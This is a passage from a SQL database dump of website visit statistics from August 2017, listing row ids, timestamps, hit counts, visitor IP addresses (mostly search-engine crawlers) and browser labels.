66.194','other'),(146483,1502976182,1,1,0,0,'180.76.15.24','other'),(146484,1502976515,1,1,0,0,'217.182.132.77','other'),(146485,1502976596,1,1,0,0,'141.8.142.21','other'),(146486,1502976817,1,1,0,0,'37.52.19.230','chrome'),(146487,1502976855,1,1,0,0,'91.196.178.72','chrome'),(146488,1502977530,1,1,0,0,'91.196.178.67','firefox'),(146489,1502977637,1,1,0,0,'217.69.133.5','other'),(146490,1502978102,2,2,0,0,'141.8.142.21','other'),(146491,1502978870,1,1,0,0,'46.200.150.74','chrome'),(146492,1502979541,1,1,0,0,'178.154.200.7','other'),(146493,1502979549,1,1,0,0,'213.180.203.32','other'),(146494,1502979664,1,1,0,0,'5.45.207.42','other'),(146495,1502979667,1,1,0,0,'141.8.142.45','other'),(146496,1502979671,1,1,0,0,'37.9.113.138','other'),(146497,1502979865,1,1,0,0,'217.182.132.37','other'),(146498,1502979999,1,1,0,0,'217.182.132.183','other'),(146499,1502980161,1,1,0,0,'130.180.210.161','chrome'),(146500,1502980174,1,1,0,0,'51.255.65.33','other'),(146501,1502980216,1,1,0,0,'130.0.52.227','chrome'),(146502,1502980681,1,1,0,0,'37.9.113.138','other'),(146503,1502981446,1,1,0,0,'51.255.71.132','other'),(146504,1502981471,1,0,1,0,'68.180.228.221',''),(146505,1502982118,1,1,0,0,'5.255.253.29','other'),(146506,1502982120,1,1,0,0,'217.69.133.194','other'),(146507,1502982152,1,1,0,0,'217.182.132.84','other'),(146508,1502982241,1,0,1,0,'66.249.66.157',''),(146509,1502982327,2,2,0,0,'216.244.66.246','other'),(146510,1502982382,1,1,0,0,'180.76.15.12','other'),(146511,1502982472,1,1,0,0,'162.210.196.98','other'),(146512,1502983092,1,1,0,0,'217.69.133.194','other'),(146513,1502984239,1,0,1,0,'68.180.228.221',''),(146514,1502984491,2,2,0,0,'159.224.177.211','chrome'),(146515,1502984547,1,1,0,0,'91.209.11.236','other'),(146516,1502984603,4,4,0,0,'216.244.66.246','other'),(146517,1502984828,1,1,0,0,'51.255.65.69','other'),(146518,1502985234,1,1,0,0,'40.77.167.9','other'),(146519,1502985304,1,1,0,0,'5.45.207.32','other'),(146520,1502985382,1,0,1,0,'66.249.66.75',''),(146521,1502985628,1,1,0,0,'217.182.132.191','other'),(146522,1502985836,1,1,0,0,'195.225.231.222','chrome'),(146523,1502985964,1,1,0,0,'8.29.198.27','other'),(146524,1502986158,1,1,0,0,'217.182.132.147','other'),(146525,1502986491,1,1,0,0,'40.77.167.122','other'),(146526,1502986593,1,1,0,0,'51.255.65.48','other'),(146527,1502986626,4,4,0,0,'216.244.66.194','other'),(146528,1502986639,1,1,0,0,'180.76.15.156','other'),(146529,1502986659,1,1,0,0,'217.182.132.240','other'),(146530,1502986687,1,1,0,0,'204.79.180.4','msie'),(146531,1502986708,1,1,0,0,'217.182.132.60','other'),(146532,1502987241,1,1,0,0,'217.182.132.35','other'),(146533,1502987663,1,1,0,0,'217.182.132.151','other'),(146534,1502987843,1,1,0,0,'51.255.71.123','other'),(146535,1502988002,1,1,0,0,'217.182.132.62','other'),(146536,1502988094,1,1,0,0,'91.209.11.236','other'),(146537,1502988489,1,1,0,0,'51.255.71.118','other'),(146538,1502989085,1,1,0,0,'137.74.207.188','other'),(146539,1502989107,1,0,1,0,'68.180.228.221',''),(146540,1502989247,4,4,0,0,'216.244.66.194','other'),(146541,1502989749,1,1,0,0,'164.132.162.157','other'),(146542,1502989817,1,1,0,0,'164.132.162.156','other'),(146543,1502989819,1,1,0,0,'95.108.181.63','other'),(146544,1502990702,1,1,0,0,'66.249.66.155','chrome'),(146545,1502990927,1,1,0,0,'217.182.132.157','other'),(146546,1502991086,1,1,0,0,'141.8.183.5','other'),(146547,1502991543,1,1,0,0,'164.132.162.153','other'),(146548,1502992074,1,1,0,0,'51.255.71.117','other'),(146549,1502992099,1,1,0,0,'216.244.66.246','other'),(146550,1502992183,1,1,0,0,'91.196.178.163','chrome'),(146551,1502992325,1,1,0,0,'217.182.132.156','other'),(146552,1502992404,1,1,0,0,'217.182.132.69','other'),(146553,1502992584,1,1,0,0,'217.182.132.183','other'),(146554,1502992676,1,1,0,0,'51.255.65.32','other'),(146555,1502992943,1,1,0,0,'40.77.167.9','other'),(146556,1502993105,1,1,0,0,'141.8.183.5','other'),(146557,1502993209,1,1,0,0,'51.255.65.18','other'),(146558,1502993670,1,1,0,0,'208.90.57.196','firefox'),(146559,1502993712,1,1,0,0,'217.182.132.240','other'),(146560,1502994410,1,1,0,0,'51.255.65.22','other'),(146561,1502994671,1,1,0,0,'40.77.167.9','other'),(146562,1502994964,4,4,0,0,'216.244.66.194','other'),(146563,1502995259,1,1,0,0,'51.255.65.79','other'),(146564,1502995285,2,2,0,0,'51.255.65.17','other'),(146565,1502995457,1,1,0,0,'216.244.66.246','other'),(146566,1502996744,1,1,0,0,'91.209.11.236','other'),(146567,1502996790,1,1,0,0,'8.29.198.25','other'),(146568,1502997438,1,1,0,0,'217.182.132.80','other'),(146569,1502998029,1,1,0,0,'51.255.71.131','other'),(146570,1502998050,1,1,0,0,'178.159.37.105','chrome'),(146571,1502998860,1,1,0,0,'217.182.132.61','other'),(146572,1502998958,1,1,0,0,'217.182.132.36','other'),(146573,1502998964,1,1,0,0,'217.182.132.177','other'),(146574,1502999442,1,1,0,0,'91.209.11.236','other'),(146575,1502999929,1,1,0,0,'51.255.65.62','other'),(146576,1503000116,1,1,0,0,'51.255.65.28','other'),(146577,1503000421,1,1,0,0,'164.132.162.158','other'),(146578,1503000671,1,1,0,0,'91.209.11.236','other'),(146579,1503000716,1,1,0,0,'137.74.201.100','other'),(146580,1503001249,1,1,0,0,'217.182.132.65','other'),(146581,1503001893,3,3,0,0,'216.244.66.246','other'),(146582,1503002191,1,1,0,0,'217.182.132.35','other'),(146583,1503002508,1,1,0,0,'217.182.132.65','other'),(146584,1503002707,1,1,0,0,'91.209.11.236','other'),(146585,1503003650,1,1,0,0,'217.182.132.59','other'),(146586,1503003918,1,1,0,0,'217.182.132.150','other'),(146587,1503004688,1,1,0,0,'213.180.203.32','other'),(146588,1503004778,1,1,0,0,'217.182.132.184','other'),(146589,1503005065,1,1,0,0,'51.255.65.35','other'),(146590,1503005132,1,1,0,0,'66.249.66.155','chrome'),(146591,1503005618,1,1,0,0,'216.244.66.246','other'),(146592,1503005811,1,1,0,0,'217.182.132.4','other'),(146593,1503006187,1,1,0,0,'217.182.132.16','other'),(146594,1503006300,7,7,0,0,'216.244.66.194','other'),(146595,1503006607,1,1,0,0,'91.209.11.236','other'),(146596,1503006907,1,1,0,0,'217.182.132.56','other'),(146597,1503007477,1,1,0,0,'157.55.39.34','other'),(146598,1503007621,1,1,0,0,'8.29.198.25','other'),(146599,1503007639,1,1,0,0,'51.255.65.39','other'),(146600,1503007899,1,1,0,0,'213.180.203.32','other'),(146601,1503007958,1,1,0,0,'40.77.167.122','other'),(146602,1503007960,1,1,0,0,'51.255.71.132','other'),(146603,1503008491,7,7,0,0,'216.244.66.194','other'),(146604,1503009041,1,1,0,0,'5.255.253.4','other'),(146605,1503009498,1,1,0,0,'217.69.133.6','other'),(146606,1503010505,1,1,0,0,'51.255.65.40','other'),(146607,1503011263,1,1,0,0,'5.45.207.42','other'),(146608,1503011468,3,3,0,0,'216.244.66.246','other'),(146609,1503011979,2,0,2,0,'68.180.228.221',''),(146610,1503012171,1,1,0,0,'91.209.11.236','other'),(146611,1503012173,1,1,0,0,'217.182.132.79','other'),(146612,1503012660,1,1,0,0,'40.77.167.9','other'),(146613,1503012711,1,1,0,0,'51.255.65.15','other'),(146614,1503013187,1,1,0,0,'37.9.113.138','other'),(146615,1503013275,1,1,0,0,'51.255.65.70','other'),(146616,1503013557,7,7,0,0,'216.244.66.194','other'),(146617,1503013624,1,1,0,0,'217.182.132.50','other'),(146618,1503014732,2,2,0,0,'217.182.132.146','other'),(146619,1503014851,1,1,0,0,'5.45.207.32','other'),(146620,1503015666,1,0,1,0,'66.249.66.157',''),(146621,1503015863,1,1,0,0,'217.69.133.3','other'),(146622,1503016096,1,1,0,0,'51.255.65.38','other'),(146623,1503016231,1,1,0,0,'217.182.132.77','other'),(146624,1503016254,1,1,0,0,'217.182.132.78','other'),(146625,1503016298,1,1,0,0,'5.45.207.32','other'),(146626,1503016946,1,1,0,0,'141.8.142.45','other'),(146627,1503017157,1,1,0,0,'217.182.132.68','other'),(146628,1503017417,1,1,0,0,'51.255.65.26','other'),(146629,1503017669,1,1,0,0,'51.255.65.55','other'),(146630,1503018262,1,1,0,0,'141.8.142.21','other'),(146631,1503018444,1,1,0,0,'8.29.198.26','other'),(146632,1503018579,1,1,0,0,'217.182.132.173','other'),(146633,1503018635,1,1,0,0,'83.149.126.98','other'),(146634,1503018859,1,1,0,0,'217.182.132.153','other'),(146635,1503019667,1,0,1,0,'66.249.66.74',''),(146636,1503019892,1,1,0,0,'51.255.71.126','other'),(146637,1503020071,1,1,0,0,'164.132.162.188','other'),(146638,1503020543,1,0,1,0,'66.249.66.156',''),(146639,1503020592,1,1,0,0,'178.154.200.7','other'),(146640,1503020812,1,1,0,0,'5.45.207.64','other'),(146641,1503021031,1,1,0,0,'51.255.65.29','other'),(146642,1503021062,1,1,0,0,'51.255.65.13','other'),(146643,1503021356,1,1,0,0,'157.55.39.34','other'),(146644,1503021822,2,2,0,0,'216.244.66.246','other'),(146645,1503022613,1,1,0,0,'217.182.132.81','other'),(146646,1503022690,1,1,0,0,'51.255.65.93','other'),(146647,1503022910,1,0,1,0,'66.249.66.156',''),(146648,1503023102,1,1,0,0,'217.182.132.90','other'),(146649,1503023194,1,1,0,0,'151.80.27.116','other'),(146650,1503023248,1,1,0,0,'217.182.132.31','other'),(146651,1503023366,1,1,0,0,'40.77.167.60','other'),(146652,1503023582,1,1,0,0,'51.255.65.69','other'),(146653,1503023722,1,0,1,0,'66.249.66.155',''),(146654,1503023860,1,1,0,0,'141.8.183.5','other'),(146655,1503023929,1,1,0,0,'217.182.132.240','other'),(146656,1503024498,1,1,0,0,'91.209.11.236','other'),(146657,1503024637,4,4,0,0,'216.244.66.194','other'),(146658,1503025143,1,1,0,0,'51.255.65.60','other'),(146659,1503025860,1,1,0,0,'40.77.167.60','other'),(146660,1503026022,1,1,0,0,'51.255.65.81','other'),(146661,1503026209,1,1,0,0,'51.255.65.86','other'),(146662,1503026589,1,1,0,0,'91.209.11.236','other'),(146663,1503026852,1,1,0,0,'51.255.65.96','other'),(146664,1503026992,1,1,0,0,'178.154.200.7','other'),(146665,1503027151,3,3,0,0,'216.244.66.246','other'),(146666,1503027153,1,1,0,0,'51.255.71.129','other'),(146667,1503027249,1,1,0,0,'5.45.207.64','other'),(146668,1503027601,1,1,0,0,'51.255.65.58','other'),(146669,1503027782,1,1,0,0,'5.45.207.66','other'),(146670,1503027787,1,1,0,0,'91.209.11.236','other'),(146671,1503028048,1,1,0,0,'213.180.203.32','other'),(146672,1503028130,1,1,0,0,'51.255.65.48','other'),(146673,1503028165,1,1,0,0,'217.182.132.92','other'),(146674,1503028349,1,1,0,0,'40.77.167.9','other'),(146675,1503028711,1,1,0,0,'51.255.65.17','other'),(146676,1503029036,1,1,0,0,'51.255.71.121','other'),(146677,1503029242,1,1,0,0,'217.182.132.37','other'),(146678,1503029251,1,1,0,0,'141.8.183.5','other'),(146679,1503029269,1,1,0,0,'8.29.198.26','other'),(146680,1503029417,1,1,0,0,'51.255.65.22','other'),(146681,1503029735,1,1,0,0,'51.255.71.100','other'),(146682,1503029962,1,1,0,0,'51.255.65.11','other'),(146683,1503030058,1,1,0,0,'51.255.65.4','other'),(146684,1503030126,1,1,0,0,'137.74.207.170','other'),(146685,1503030369,1,1,0,0,'5.45.207.32','other'),(146686,1503030904,1,1,0,0,'216.244.66.246','other'),(146687,1503031066,1,1,0,0,'91.196.178.65','firefox'),(146688,1503031483,1,1,0,0,'51.255.65.47','other'),(146689,1503031513,1,1,0,0,'91.209.11.236','other'),(146690,1503031663,1,1,0,0,'95.108.181.69','other'),(146691,1503031722,1,1,0,0,'51.255.65.68','other'),(146692,1503031918,1,1,0,0,'141.8.142.21','other'),(146693,1503032123,1,1,0,0,'216.244.66.246','other'),(146694,1503032450,1,1,0,0,'217.182.132.191','other'),(146695,1503033162,1,1,0,0,'141.8.183.1','other'),(146696,1503033330,1,1,0,0,'51.255.65.35','other'),(146697,1503033370,1,1,0,0,'91.209.11.236','other'),(146698,1503034048,3,3,0,0,'216.244.66.246','other'),(146699,1503034264,1,1,0,0,'51.255.65.24','other'),(146700,1503035059,2,2,0,0,'91.209.11.236','other'),(146701,1503035085,1,1,0,0,'217.182.132.183','other'),(146702,1503035113,1,1,0,0,'51.255.65.36','other'),(146703,1503035636,1,1,0,0,'217.182.132.19','other'),(146704,1503035715,1,1,0,0,'66.249.66.75','chrome'),(146705,1503035955,1,1,0,0,'95.108.181.63','other'),(146706,1503036258,1,1,0,0,'164.132.162.187','other'),(146707,1503036280,1,1,0,0,'51.255.65.35','other'),(146708,1503037079,1,1,0,0,'51.255.65.90','other'),(146709,1503037220,1,1,0,0,'37.9.113.94','other'),(146710,1503037713,1,1,0,0,'217.182.132.66','other'),(146711,1503037936,1,1,0,0,'217.182.132.29','other'),(146712,1503037958,1,1,0,0,'91.196.178.72','chrome'),(146713,1503038062,1,1,0,0,'5.45.207.15','other'),(146714,1503038238,1,1,0,0,'217.182.132.16','other'),(146715,1503038447,1,0,1,0,'68.180.228.221',''),(146716,1503038448,3,3,0,0,'216.244.66.194','other'),(146717,1503038976,1,1,0,0,'95.108.181.63','other'),(146718,1503039098,1,1,0,0,'217.182.132.62','other'),(146719,1503039285,1,1,0,0,'213.174.11.139','firefox'),(146720,1503039346,1,1,0,0,'31.43.24.227','chrome'),(146721,1503039746,1,1,0,0,'46.201.175.91','firefox'),(146722,1503039825,1,1,0,0,'217.182.132.30','other'),(146723,1503040094,1,1,0,0,'8.29.198.27','other'),(146724,1503040202,1,1,0,0,'137.74.207.119','other'),(146725,1503040503,1,1,0,0,'91.196.178.67','chrome'),(146726,1503040737,2,2,0,0,'91.209.11.236','other'),(146727,1503041115,1,1,0,0,'91.196.178.69','firefox'),(146728,1503041117,1,1,0,0,'37.52.102.48','chrome'),(146729,1503041351,4,4,0,0,'54.165.59.7','other'),(146730,1503041491,1,1,0,0,'95.108.181.69','other'),(146731,1503041693,1,1,0,0,'66.249.93.204','chrome'),(146732,1503042025,1,1,0,0,'141.8.183.5','other'),(146733,1503042334,4,4,0,0,'216.244.66.246','other'),(146734,1503042360,1,1,0,0,'95.134.223.206','chrome'),(146735,1503042807,1,1,0,0,'141.8.142.45','other'),(146736,1503043158,1,1,0,0,'95.108.181.69','other'),(146737,1503043679,1,0,1,0,'66.249.66.74',''),(146738,1503043807,1,0,1,0,'68.180.228.221',''),(146739,1503044158,1,1,0,0,'91.209.11.236','other'),(146740,1503044303,1,1,0,0,'141.8.142.21','other'),(146741,1503044400,2,2,0,0,'216.244.66.194','other'),(146742,1503044711,1,0,1,0,'68.180.228.221',''),(146743,1503045140,1,1,0,0,'46.201.175.91','firefox'),(146744,1503045451,1,1,0,0,'180.76.15.159','other'),(146745,1503045533,1,1,0,0,'217.182.132.146','other'),(146746,1503045551,1,1,0,0,'5.45.207.32','other'),(146747,1503045553,11,11,0,0,'5.189.167.24','other'),(146748,1503045736,1,1,0,0,'51.255.65.19','other'),(146749,1503045996,1,1,0,0,'217.182.132.51','other'),(146750,1503046009,2,2,0,0,'216.244.66.246','other'),(146751,1503046222,1,1,0,0,'141.8.183.5','other'),(146752,1503046239,1,1,0,0,'51.255.65.69','other'),(146753,1503046388,2,2,0,0,'91.209.11.236','other'),(146754,1503046586,1,1,0,0,'51.255.71.129','other'),(146755,1503046728,1,1,0,0,'94.179.166.13','chrome'),(146756,1503046897,1,1,0,0,'137.74.201.108','other'),(146757,1503047067,1,1,0,0,'217.182.132.176','other'),(146758,1503047289,5,5,0,0,'216.244.66.194','other'),(146759,1503047627,1,1,0,0,'217.182.132.37','other'),(146760,1503047907,1,1,0,0,'94.45.46.214','firefox'),(146761,1503047909,2,2,0,0,'91.209.11.236','other'),(146762,1503047930,1,1,0,0,'5.45.207.64','other'),(146763,1503047940,1,1,0,0,'141.8.183.5','other'),(146764,1503048880,1,1,0,0,'217.182.132.7','other'),(146765,1503049104,1,1,0,0,'51.255.65.92','other'),(146766,1503049634,1,1,0,0,'217.182.132.147','other'),(146767,1503050050,1,1,0,0,'137.74.207.170','other'),(146768,1503050922,1,1,0,0,'8.29.198.26','other'),(146769,1503051713,2,2,0,0,'91.209.11.236','other'),(146770,1503051805,1,1,0,0,'141.8.183.1','other'),(146771,1503052050,1,1,0,0,'217.77.209.134','chrome'),(146772,1503052153,1,1,0,0,'95.108.181.63','other'),(146773,1503052423,1,1,0,0,'51.255.65.47','other'),(146774,1503052531,1,1,0,0,'217.182.132.154','other'),(146775,1503052559,6,6,0,0,'216.244.66.246','other'),(146776,1503053014,1,1,0,0,'69.30.213.82','other'),(146777,1503053507,1,1,0,0,'216.244.66.246','other'),(146778,1503053925,1,1,0,0,'141.8.183.1','other'),(146779,1503054634,1,1,0,0,'51.255.71.115','other'),(146780,1503054746,2,2,0,0,'5.45.207.64','other'),(146781,1503054859,1,1,0,0,'217.182.132.72','other'),(146782,1503054967,1,1,0,0,'91.196.178.40','chrome'),(146783,1503055115,4,4,0,0,'216.244.66.194','other'),(146784,1503055133,1,1,0,0,'91.196.178.162','chrome'),(146785,1503055236,1,1,0,0,'37.9.113.163','other'),(146786,1503055472,2,2,0,0,'5.255.253.4','other'),(146787,1503055536,1,1,0,0,'207.46.13.168','other'),(146788,1503055759,1,1,0,0,'217.182.132.178','other'),(146789,1503055840,2,2,0,0,'141.8.183.1','other'),(146790,1503055894,1,1,0,0,'40.77.167.27','other'),(146791,1503055918,1,1,0,0,'37.9.113.180','other'),(146792,1503055921,2,2,0,0,'5.45.207.32','other'),(146793,1503055925,1,1,0,0,'141.8.142.21','other'),(146794,1503055941,1,1,0,0,'5.45.207.26','other'),(146795,1503056097,1,1,0,0,'37.9.113.78','other'),(146796,1503056101,2,2,0,0,'95.108.181.69','other'),(146797,1503056163,2,2,0,0,'213.180.203.32','other'),(146798,1503056167,2,2,0,0,'141.8.183.5','other'),(146799,1503056231,1,1,0,0,'217.182.132.87','other'),(146800,1503056278,4,4,0,0,'216.244.66.246','other'),(146801,1503056293,1,1,0,0,'91.196.178.136','firefox'),(146802,1503056404,1,1,0,0,'51.255.65.82','other'),(146803,1503056635,1,1,0,0,'5.45.207.64','other'),(146804,1503056658,1,1,0,0,'178.154.200.7','other'),(146805,1503056814,2,2,0,0,'37.9.113.94','other'),(146806,1503056817,1,1,0,0,'37.9.113.163','other'),(146807,1503056943,1,1,0,0,'141.8.142.21','other'),(146808,1503056985,1,1,0,0,'51.255.65.68','other'),(146809,1503057800,1,1,0,0,'51.255.65.70','other'),(146810,1503057829,1,1,0,0,'5.45.207.32','other'),(146811,1503058090,1,1,0,0,'5.255.253.4','other'),(146812,1503058742,3,3,0,0,'216.244.66.194','other'),(146813,1503059639,1,1,0,0,'51.255.65.27','other'),(146814,1503059777,1,1,0,0,'141.8.183.5','other'),(146815,1503059883,1,1,0,0,'137.74.207.114','other'),(146816,1503060703,3,3,0,0,'91.209.11.236','other'),(146817,1503061106,1,1,0,0,'51.255.66.102','other'),(146818,1503061185,1,1,0,0,'51.255.65.32','other'),(146819,1503061254,3,3,0,0,'216.244.66.246','other'),(146820,1503061757,1,1,0,0,'8.29.198.26','other'),(146821,1503061799,1,1,0,0,'217.182.132.153','other'),(146822,1503061856,1,1,0,0,'51.255.65.21','other'),(146823,1503061936,1,1,0,0,'217.182.132.60','other'),(146824,1503062364,1,1,0,0,'51.255.65.92','other'),(146825,1503062866,1,1,0,0,'91.209.11.236','other'),(146826,1503063406,1,1,0,0,'5.45.207.56','other'),(146827,1503063409,1,1,0,0,'141.8.183.5','other'),(146828,1503063576,1,1,0,0,'213.180.203.32','other'),(146829,1503063827,1,1,0,0,'5.45.207.66','other'),(146830,1503063840,1,1,0,0,'130.180.220.17','chrome'),(146831,1503063894,1,1,0,0,'51.255.71.128','other'),(146832,1503064266,1,1,0,0,'217.182.132.93','other'),(146833,1503064446,1,1,0,0,'51.255.65.93','other'),(146834,1503065006,1,1,0,0,'217.69.133.3','other'),(146835,1503065040,1,1,0,0,'217.69.133.9','other'),(146836,1503065221,1,1,0,0,'141.8.183.5','other'),(146837,1503065382,1,1,0,0,'51.255.65.28','other'),(146838,1503065792,3,3,0,0,'216.244.66.194','other'),(146839,1503066048,1,1,0,0,'51.255.65.10','other'),(146840,1503066397,1,1,0,0,'5.45.207.26','other'),(146841,1503066504,1,1,0,0,'40.77.167.9','other'),(146842,1503066688,1,1,0,0,'66.102.9.27','chrome'),(146843,1503066889,1,1,0,0,'46.165.197.142','other'),(146844,1503067005,2,2,0,0,'217.182.132.68','other'),(146845,1503067039,1,1,0,0,'95.108.181.69','other'),(146846,1503067644,1,1,0,0,'137.74.207.120','other'),(146847,1503067840,1,1,0,0,'164.132.164.180','other'),(146848,1503067901,1,1,0,0,'141.8.183.1','other'),(146849,1503067907,1,1,0,0,'51.255.65.25','other'),(146850,1503067988,1,1,0,0,'91.196.178.164','chrome'),(146851,1503068005,1,1,0,0,'91.209.11.236','other'),(146852,1503068159,2,2,0,0,'91.196.178.135','chrome'),(146853,1503068252,2,2,0,0,'178.154.200.7','other'),(146854,1503068283,2,2,0,0,'5.45.207.32','other'),(146855,1503068494,1,1,0,0,'217.182.132.95','other'),(146856,1503068507,1,1,0,0,'95.108.181.69','other'),(146857,1503068729,2,2,0,0,'5.45.207.64','other'),(146858,1503068841,1,1,0,0,'40.77.167.27','other'),(146859,1503068857,1,1,0,0,'141.8.183.1','other'),(146860,1503068989,1,1,0,0,'37.9.113.94','other'),(146861,1503069025,2,2,0,0,'213.180.203.32','other'),(146862,1503069039,1,1,0,0,'95.108.181.63','other'),(146863,1503069048,1,1,0,0,'51.255.65.33','other'),(146864,1503069266,1,1,0,0,'217.182.132.87','other'),(146865,1503069417,2,2,0,0,'37.9.113.163','other'),(146866,1503069916,1,1,0,0,'137.74.207.120','other'),(146867,1503070041,1,1,0,0,'178.154.200.27','other'),(146868,1503070057,1,1,0,0,'5.45.207.42','other'),(146869,1503070352,1,1,0,0,'217.182.132.29','other'),(146870,1503070615,1,1,0,0,'51.255.65.91','other'),(146871,1503071085,1,1,0,0,'164.132.162.153','other'),(146872,1503071119,5,5,0,0,'216.244.66.246','other'),(146873,1503071829,1,1,0,0,'5.45.207.26','other'),(146874,1503071975,1,1,0,0,'40.77.167.27','other'),(146875,1503072027,1,1,0,0,'91.209.11.236','other'),(146876,1503072182,1,1,0,0,'51.255.71.113','other'),(146877,1503072374,4,4,0,0,'216.244.66.194','other'),(146878,1503072609,1,1,0,0,'8.29.198.25','other'),(146879,1503072722,1,1,0,0,'5.45.207.32','other'),(146880,1503072759,1,1,0,0,'180.76.15.161','other'),(146881,1503073019,1,1,0,0,'193.107.73.124','other'),(146882,1503073174,1,1,0,0,'5.45.207.64','other'),(146883,1503073245,1,1,0,0,'217.182.132.81','other'),(146884,1503073314,1,0,1,0,'66.249.66.155',''),(146885,1503073658,1,1,0,0,'51.255.65.53','other'),(146886,1503073664,2,0,2,0,'68.180.228.221',''),(146887,1503073804,1,0,1,0,'66.249.66.156',''),(146888,1503073966,1,1,0,0,'217.182.132.56','other'),(146889,1503074100,1,1,0,0,'51.255.65.73','other'),(146890,1503074112,1,1,0,0,'137.74.207.108','other'),(146891,1503074576,1,1,0,0,'51.255.65.51','other'),(146892,1503074631,1,1,0,0,'51.255.65.38','other'),(146893,1503075491,1,1,0,0,'5.45.207.32','other'),(146894,1503075926,1,1,0,0,'217.69.133.194','other'),(146895,1503076006,1,1,0,0,'51.255.71.126','other'),(146896,1503076363,5,5,0,0,'216.244.66.246','other'),(146897,1503076603,2,2,0,0,'91.209.11.236','other'),(146898,1503076728,1,1,0,0,'51.255.71.131','other'),(146899,1503077258,1,1,0,0,'217.182.132.5','other'),(146900,1503078776,1,1,0,0,'51.255.71.110','other'),(146901,1503079103,1,1,0,0,'217.182.132.37','other'),(146902,1503079252,1,1,0,0,'217.182.132.57','other'),(146903,1503079438,1,1,0,0,'213.180.203.32','other'),(146904,1503079849,1,1,0,0,'207.46.13.168','other'),(146905,1503080079,1,0,1,0,'68.180.228.221',''),(146906,1503080521,1,1,0,0,'217.182.132.84','other'),(146907,1503080559,2,2,0,0,'91.209.11.236','other'),(146908,1503080767,1,1,0,0,'217.182.132.92','other'),(146909,1503081341,1,1,0,0,'5.45.207.64','other'),(146910,1503081692,1,1,0,0,'216.244.66.246','other'),(146911,1503081762,1,1,0,0,'164.132.162.157','other'),(146912,1503082491,1,1,0,0,'91.209.11.236','other'),(146913,1503082870,1,1,0,0,'37.73.236.78','chrome'),(146914,1503082901,1,1,0,0,'107.167.113.26','other'),(146915,1503082979,1,1,0,0,'51.255.65.51','other'),(146916,1503083040,1,1,0,0,'37.55.59.205','chrome'),(146917,1503083393,1,1,0,0,'66.249.83.220','chrome'),(146918,1503083394,1,1,0,0,'66.249.83.218','chrome'),(146919,1503083429,1,1,0,0,'95.108.181.69','other'),(146920,1503083443,1,1,0,0,'8.29.198.25','other'),(146921,1503083655,1,1,0,0,'91.196.178.37','chrome'),(146922,1503083729,1,1,0,0,'5.45.207.64','other'),(146923,1503083926,1,1,0,0,'51.255.71.133','other'),(146924,1503084002,1,1,0,0,'37.9.113.163','other'),(146925,1503084332,1,1,0,0,'37.9.113.180','other'),(146926,1503084430,1,1,0,0,'178.154.171.59','other'),(146927,1503084755,1,1,0,0,'137.74.201.99','other'),(146928,1503084789,1,1,0,0,'217.182.132.177','other'),(146929,1503084809,1,1,0,0,'5.45.207.64','other'),(146930,1503084862,1,1,0,0,'51.255.65.14','other'),(146931,1503084892,1,1,0,0,'217.182.132.91','other'),(146932,1503084950,12,12,0,0,'216.244.66.194','other'),(146933,1503085209,5,5,0,0,'216.244.66.246','other'),(146934,1503085539,1,1,0,0,'51.255.65.37','other'),(146935,1503086242,2,2,0,0,'91.209.11.236','other'),(146936,1503086399,1,1,0,0,'66.249.66.74','chrome'),(146937,1503086740,1,1,0,0,'51.255.71.118','other'),(146938,1503087108,1,1,0,0,'95.108.181.63','other'),(146939,1503088630,1,1,0,0,'217.69.133.3','other'),(146940,1503088998,1,1,0,0,'51.255.65.5','other'),(146941,1503089115,1,1,0,0,'141.8.183.5','other'),(146942,1503089183,1,1,0,0,'207.46.13.168','other'),(146943,1503089445,1,1,0,0,'91.209.11.236','other'),(146944,1503089595,1,1,0,0,'217.182.132.192','other'),(146945,1503090107,1,1,0,0,'5.45.207.64','other'),(146946,1503090899,1,1,0,0,'217.182.132.172','other'),(146947,1503090959,2,2,0,0,'216.244.66.246','other'),(146948,1503091668,1,1,0,0,'141.8.142.45','other'),(146949,1503092441,1,1,0,0,'51.255.65.61','other'),(146950,1503092565,1,1,0,0,'178.154.200.7','other'),(146951,1503092629,1,1,0,0,'137.74.207.109','other'),(146952,1503092731,1,1,0,0,'51.255.65.79','other'),(146953,1503092739,1,1,0,0,'217.182.132.15','other'),(146954,1503092950,1,0,1,0,'68.180.228.221',''),(146955,1503092986,1,1,0,0,'51.255.65.6','other'),(146956,1503093096,1,1,0,0,'51.255.138.90','firefox'),(146957,1503093495,1,1,0,0,'207.46.13.168','other'),(146958,1503093577,1,1,0,0,'91.209.11.236','other'),(146959,1503093664,1,1,0,0,'141.8.183.1','other'),(146960,1503094058,1,0,1,0,'68.180.228.221',''),(146961,1503094277,1,1,0,0,'8.29.198.27','other'),(146962,1503094282,1,1,0,0,'141.8.142.45','other'),(146963,1503094462,1,1,0,0,'51.255.65.66','other'),(146964,1503094732,1,0,1,0,'66.249.76.107',''),(146965,1503095285,4,4,0,0,'216.244.66.194','other'),(146966,1503095314,1,1,0,0,'91.209.11.236','other'),(146967,1503095404,3,3,0,0,'216.244.66.246','other'),(146968,1503095563,1,1,0,0,'95.220.35.217','msie'),(146969,1503095596,1,1,0,0,'217.69.143.217','firefox'),(146970,1503095716,40,40,0,0,'192.99.203.35','other'),(146971,1503095784,1,1,0,0,'217.182.132.185','other'),(146972,1503095804,1,1,0,0,'217.182.132.77','other'),(146973,1503096247,1,1,0,0,'5.45.207.64','other'),(146974,1503096502,1,1,0,0,'164.132.162.156','other'),(146975,1503096872,1,1,0,0,'217.182.132.185','other'),(146976,1503097106,1,0,1,0,'66.249.66.76',''),(146977,1503098120,1,1,0,0,'213.180.203.32','other'),(146978,1503098240,1,1,0,0,'217.182.132.94','other'),(146979,1503098376,1,1,0,0,'5.45.207.56','other'),(146980,1503098398,1,1,0,0,'91.209.11.236','other'),(146981,1503099277,1,1,0,0,'141.8.142.21','other'),(146982,1503099383,1,1,0,0,'51.255.71.133','other'),(146983,1503099502,1,1,0,0,'178.137.82.201','firefox'),(146984,1503099828,1,1,0,0,'217.182.132.73','other'),(146985,1503099876,1,1,0,0,'40.77.167.9','other'),(146986,1503100006,1,1,0,0,'51.255.71.125','other'),(146987,1503101298,1,1,0,0,'51.255.65.38','other'),(146988,1503101482,1,1,0,0,'51.255.65.79','other'),(146989,1503101658,5,5,0,0,'216.244.66.246','other'),(146990,1503102077,1,1,0,0,'51.255.65.3','other'),(146991,1503102107,1,1,0,0,'95.108.181.69','other'),(146992,1503102566,1,1,0,0,'91.209.11.236','other'),(146993,1503103708,1,0,1,0,'66.249.66.75',''),(146994,1503103843,1,1,0,0,'217.182.132.52','other'),(146995,1503104049,1,0,1,0,'66.249.76.93',''),(146996,1503104160,1,0,1,0,'66.249.66.76',''),(146997,1503104306,1,1,0,0,'217.182.13